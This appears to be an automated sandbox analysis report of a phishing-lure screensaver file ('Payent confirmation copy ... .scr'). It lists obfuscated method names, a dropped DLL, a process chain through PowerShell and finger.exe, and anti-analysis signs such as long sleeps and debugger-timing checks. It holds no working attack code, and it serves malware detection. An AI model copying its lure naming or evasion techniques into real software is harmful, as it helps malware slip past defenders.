Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, W3xqtbssSmfMGuTvJuC.cs	High entropy of concatenated method names: 'CnttgCwOv3', 'VohtzFRGDd', 'UUsLYI9iyO', 'FKhL3YaRqC', 'yXuLJAVIui', 'Yg9LdxPUxL', 'AhuLo4vnxn', 'bmYLkgm6Rk', 't3JLVOtWrf', 'aQxLW8UBMn'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, efV8jdshvdLqdLIF0VS.cs	High entropy of concatenated method names: 'ToString', 'iElLCEHUA1', 'zeBLR5VhFg', 'shxLNlnAGt', 'NYPLanXipe', 'i8iLqTZGRp', 'r4ZLsvOYNU', 'b5lLiNcS0j', 'jQx6AwpKiyP9G33p797', 'XHI2JJp9YxkiwfATQZY'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	High entropy of concatenated method names: 'bRddkoH7av', 'L2idVtbWQd', 'gNZdWqma8P', 'aJRdxEUbkS', 'hDNdnvmQ4x', 'O7IdQhKCTe', 'V12dbajUP7', 'PPbdvX4XPq', 'HZndyEsBd7', 'N3EdlWxyoL'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, QE5OneWd920YCRlW4g.cs	High entropy of concatenated method names: 'N7L3bh76XB', 'jYv3vs1yKD', 'rji3locMM5', 'pwM3DQ1gi3', 'lnM3GXMb6n', 'aiq3c3unL2', 'xHRENDytCIP9tFj3Ja', 'RWPXjyEHkXw3d58QGm', 'A0e33CNsxb', 'NKd3d1rIWu'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, FPx2LFNdTv2kEAw824.cs	High entropy of concatenated method names: 'tGKbVo0Kv9', 'loXbxePUbi', 'AVxbQ0gUgn', 'ffPQgATI7J', 'S2bQzjFGFF', 'm0IbYNZxl6', 'ChMb3NQ6QL', 'yvFbJucTnx', 'cvubdQtUwJ', 'xJjboCSjLT'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, Ac7xW4lpX9vRqwB4M6.cs	High entropy of concatenated method names: 'bYYxXRFENM', 'RM6xS4qhqO', 'D5CxCi3X5d', 'wc6xRMFT2x', 'zGlxG1AU1G', 'zUnxcq0Bvt', 'oJNx4rcAES', 'NfixHXbA6h', 'xsyx9wo0t9', 'xD6xtGgpod'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, dxEJ4JRcDccomymNei.cs	High entropy of concatenated method names: 'qsGtxfD4sR', 'HGrtnkKNqb', 'iMEtQUfFdi', 'ge5tbNPT8t', 'WIgt9AGYr6', 'zVwtvSckYf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, GT0LXboupvvgGrnSAd.cs	High entropy of concatenated method names: 'FBFb7VEnng', 'yo9b68shdp', 'wLMb2k2OQo', 'SjCbX1SiOj', 'OuCbhTXv61', 'n9CbSqwMDD', 'CHhbpcV2Mh', 'GZ4bCKB3Tw', 'LjCbRW0G09', 'HJxbNJ8rpu'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, CZ3ugisWcyJYvmGu4he.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd3TF9pTkof', 'YS6FtQxEPM', 'D4PFLE7sdd', 'REmFFYRtJH', 'pRBFm04E65', 'JrlFZcr0qs', 'wl9FKMdsBE'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, p7jRKTZMejsJHeifIa.cs	High entropy of concatenated method names: 'xM24wmRAFv', 'QCj4gtaW9T', 'SeNHYhRYHV', 'doYH3VM7L4', 'bgT4e2v2Oe', 'Cc04jemCpq', 'roJ4E5JWJW', 'HUV4U2VAYx', 'fHv4PFnImL', 'VIA4BPpb61'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, EJ1ZyShAMUg15nQSfH.cs	High entropy of concatenated method names: 'Hmr2HFMTe', 'IqNX3OcBH', 'NBeS1LGiJ', 'TOMpxRbML', 'tLrRefH9U', 'o8jNScjqM', 'VRmNTr9wBSgHXMV7dF', 'KAyhyiXBpXimJnGXqf', 'T0kHE5jhw', 'VgftC2ZZG'
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, Qh4VL4BqVBJ9QadaTR.cs	High entropy of concatenated method names: 'pR7nhZOgVQ', 'o8wnpkR2EF', 'mGbxsytUZ5', 'WFfxixkIYS', 'bUmxOynAXM', 'DQ7xfnoP0P', 'RcfxAePd03', 'GERxMLL5oQ', 'zkYxrOaG3Q', 'fuux5HaAED'

Drops PE files

Source: C:\Windows\SysWOW64\finger.exe

File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 2400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 7FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 8FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 91A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: A1A0000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00A80101 rdtsc

3_2_00A80101

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2586	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Window / User API: threadDelayed 9798	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\finger.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\finger.exe

API coverage: 2.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr TID: 3380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep count: 162 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep time: -324000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep count: 9798 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe TID: 3692	Thread sleep time: -19596000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe TID: 3700	Thread sleep time: -41000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\finger.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\finger.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\finger.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe

Code function: 6_2_61E19A2D sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,

6_2_61E19A2D

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp

